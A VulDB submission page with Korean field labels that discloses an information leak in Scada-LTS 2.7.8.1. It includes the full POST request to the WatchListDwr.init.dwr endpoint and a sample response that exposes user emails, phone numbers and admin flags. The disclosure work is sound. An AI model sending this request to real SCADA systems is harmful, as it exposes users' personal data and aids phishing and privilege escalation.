| 제목 | SCADA-LTS Scada-LTS 2.7.8.1 Exposure of Private Personal Information to an Unauthorized Acto |
|---|
| 설명 | Sensitive User Information Disclosure via WatchListDwr.init.dwr Endpoint
Summary
A vulnerability was identified in the WatchListDwr.init.dwr endpoint of SCADA-LTS that allows any authenticated user, even with minimal permissions, to access sensitive user information including usernames, emails, phone numbers, and admin status. This flaw constitutes an Information Disclosure issue and could be used to facilitate further attacks such as phishing, privilege escalation, or social engineering.
Details
Vulnerable Endpoint: POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr
Authentication Required: Yes (low-privileged user)
Affected Parameter: N/A (static DWR call)
Impact Type: Information Disclosure
By issuing a crafted POST request to the vulnerable endpoint, a low-privileged user is able to retrieve detailed information of all users in the system. The backend responds with a full JavaScript object containing data such as usernames, emails, admin flags, and phone numbers.
Sample Request:
POST /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr HTTP/1.1
Host: kubernetes.docker.internal:8080
Content-Type: text/plain
callCount=1
page=/Scada-LTS/watch_list.shtm
httpSessionId=
scriptSessionId=XYZ123456789
c0-scriptName=WatchListDwr
c0-methodName=init
c0-id=0
batchId=1
Sample Response Snippet:
javascript
s7.admin=true;
s7.email="[email protected]";
s7.username="admin";
s8.admin=false;
s8.email="[email protected]";
s8.username="anonymous";
s11.admin=false;
s11.email="[email protected]";
s11.phone="13212313131";
s11.username="user1";
Proof of Concept (PoC)
Authenticate as any valid low-privileged user.
Send the above POST request to /Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr.
Observe the server response containing sensitive information of all users in the SCADA system.
Impact
Privacy Violation: Emails, phone numbers, and usernames of all users, including administrators, are exposed.
Privilege Escalation Support: Knowledge of admin usernames and roles could be leveraged in further attacks.
Phishing and Social Engineering: Exposed contact information can be used to craft highly targeted attacks.
Reconnaissance: Attackers can map the user structure of the SCADA-LTS system for further exploitation.
References
SCADA-LTS – Official Repository
Discoverer
Natan Maia Morette
by CVE-Hunters |
|---|
| 원천 | ⚠️ https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/Sensitive%20User%20Information%20Disclosure%20via%20WatchListDwr.init.dwr%20Endpoint.md |
|---|
| 사용자 | nmmorette (UID 87361) |
|---|
| 제출 | 2025. 07. 23. AM 01:18 (9 개월 ago) |
|---|
| 모더레이션 | 2025. 08. 19. AM 07:39 (27 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 320519 [Scada-LTS 2.7.8.1 WatchListDwr.init.dwr 정보 공개] |
|---|
| 포인트들 | 20 |
|---|